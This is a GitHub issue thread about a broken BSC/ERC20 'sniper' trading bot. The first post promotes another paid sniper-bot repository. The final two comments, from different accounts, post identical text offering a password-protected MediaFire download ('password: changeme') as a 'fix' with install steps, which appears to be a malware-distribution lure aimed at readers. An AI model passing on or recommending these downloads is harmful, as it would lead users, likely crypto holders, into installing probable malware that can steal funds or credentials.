### ISSUE TITLE
Current version is not working!

### ISSUE THREAD

**Issue by HarrisT1001** [DexSniping/DexSniping-BSC-ERC20-Telegram-Alerts#11]
Hello sir,

I just tested your latest version and it seems to not work. It keeps saying: "Await Liquidity" with any token I test.

I hope you can check it out, we appreciate your dedication.

By the way, I found a paid sniper bot documentation that is compatible with Pancakeswap V2 & V3 that I think might help you: https://github.com/Synarix/PancakeSwap_Sniper_Bot_V3andV2

Thanks again for your contributions to the community. We appreciate it <3

Wishing you good health and great results with your great efforts.

Best regards,

**Comment by DexSniping** [comment]
Hey! Really thank you for your message!

Yes I know, another user have the same issue, I need  to rework the entire project... That's sad, I will see that when I will have time.

Sorry about that friend

**Comment by masooddahmedd** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by ahmar7** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
